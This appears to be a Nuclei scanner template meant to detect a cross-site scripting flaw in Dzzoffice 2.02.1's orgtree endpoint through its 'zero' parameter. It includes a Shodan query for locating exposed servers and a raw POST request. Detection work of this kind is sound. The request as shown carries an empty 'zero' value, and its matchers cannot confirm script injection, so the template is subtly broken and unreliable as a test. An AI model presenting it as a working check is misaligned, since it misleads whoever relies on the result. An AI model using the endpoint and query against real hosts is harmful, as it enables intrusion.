id: dzzoffice-xss info: name: Dzzoffice 2.02.1 - Cross-Site Scripting author: arafatansari severity: high description: | Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter. reference: - https://github.com/zyx0814/dzzoffice/issues/183 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 verified: true shodan-query: http.html:"dzzoffice" tags: dzzoffice,xss http: - raw: - | POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 id=%23&nouser=0&moderator=0&zero=&stype=0&range=0&showjob=0 matchers-condition: and matchers: - type: word words: - '"text":"' - type: word part: header words: - text/html - type: status status: - 200